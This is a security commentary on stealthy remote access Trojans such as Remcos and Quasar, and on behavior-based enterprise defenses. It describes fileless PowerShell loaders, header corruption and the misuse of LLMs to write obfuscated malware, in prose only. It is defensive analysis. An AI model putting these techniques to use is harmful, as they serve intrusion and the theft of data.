Redefining Security: The Impact of Evolving RATs on Enterprises

COMMENTARY

Remote access Trojans (RATs) are no longer just blunt instruments for cybercriminals. They’ve become more elusive, quietly shaping a new chapter in enterprise threats. Recent strains like StilachiRAT and SnowDog RAT are using corrupted DOS and PE headers to hide in plain sight, persisting undetected on enterprise systems for extended periods. 

Meanwhile, attackers have returned to using simple Windows batch files to launch sophisticated payloads like Quasar, taking advantage of the implicit trust in native system tools. This progressive movement toward new attack techniques reflects a broader trend: Attackers are innovating not through complexity, but through stealth, using everyday file formats and obfuscation tactics that bypass traditional defenses. 

Architectural Blind Spots Leave Enterprises Exposed

Today’s RATs don’t just exploit technical vulnerabilities. They also take advantage of the blind spots created by how enterprise architects establish their security environments. 

Our threat researchers recently dug into Remcos RAT, a potent malware tool that gives attackers remote control over infected systems. It often spreads through phishing emails with harmful attachments. Cybercriminals use it to: 

Related:Colt Telecommunications Struggles in Wake of Cyber Incident

We saw recent attacks that used PowerShell-based loaders to install Remcos without files. Living-off-the-land (LotL) and in-memory execution, particularly when leveraged through PowerShell, represent a potent and stealthy approach for threat actors to execute malicious commands and scripts directly in the system’s memory without writing them to disk. This “fileless” technique significantly reduces the attack footprint, making it incredibly difficult for traditional, signature-based antivirus solutions to detect. Attackers exploit PowerShell’s native capabilities, such as Invoke-Expression or Invoke-WebRequest, to download and immediately execute payloads or entire scripts from remote servers, often in heavily obfuscated form to evade detection. This combination of LOTL, in-memory execution, and PowerShell’s inherent trust facilitates evasion, persistence, and lateral movement within compromised networks. 

Attackers are rapidly leveraging artificial intelligence (AI), particularly large language models (LLMs), to escalate the scale and sophistication of their malware operations. AI empowers them to generate highly convincing phishing lures, craft more effective social engineering schemes by analyzing target profiles, and automate aspects of attack campaigns. Crucially, LLMs are being used to write and refine PowerShell code for malware. This includes generating entire malicious scripts from scratch and, importantly, enhancing existing malware with advanced obfuscation techniques making the malware detection difficult. This adaptability and resilience effectively lower the barrier to entry for less skilled cybercriminals, accelerating the development of more evasive and resilient threats. 

Related:State and Local Leaders Lobby Congress for Cybersecurity Resources

Persistent Access, Silent Damage

These stealthy RATs often maintain persistent access for weeks, allowing data exfiltration to occur without triggering any of the typical alerts. In one example, a batch file RAT infiltrated multiple remote locations and moved laterally into core applications and identity systems, quietly collecting sensitive information. Fragmented security architectures, where endpoint, identity, and network protections operate independently, give attackers unprecedented room and time to operate unnoticed. Even organizations with solid compliance programs can find themselves vulnerable if telemetry is not unified or actionable. 

Behavior Is the New Perimeter

Related:North Korea Attacks South Koreans With Ransomware

To combat this growing threat, defenders require a paradigm shift to their security approach. Models that rely on perimeter defenses and static rules cannot keep up with adversaries who repurpose legitimate tools for malicious ends. A behavior-driven strategy is essential, one that focuses on detecting intent rather than simply matching known signatures. Achieving this requires integrating technologies like Unified SASE as a Service, security information and event management (SIEM), endpoint detection and response (EDR), and network analytics to gain a more contextual view of activity across the environment.

Investment in tools that monitor how processes behave, not just what files are running, is the most recommended choice. Unusual privilege escalation or abnormal process relationships often indicate malicious activity. Enhancing visibility into outbound traffic through network telemetry and deep packet inspection helps identify obfuscated command-and-control (C2) communication.

By correlating data across endpoints, identity systems, and network layers, teams can uncover lateral movement and unauthorized access. Regular threat hunting exercises focused on RAT techniques — such as registry changes or persistence mechanisms — can expose hidden threats. And controls over system-native binaries should be tightened, ensuring these tools are used only within approved workflows. 

Looking Ahead

A more unified and behavior-aware approach to detection can significantly improve security outcomes. Reducing dwell time, improving the quality of alerts, and bridging the gaps between isolated systems all contribute to stronger overall resilience.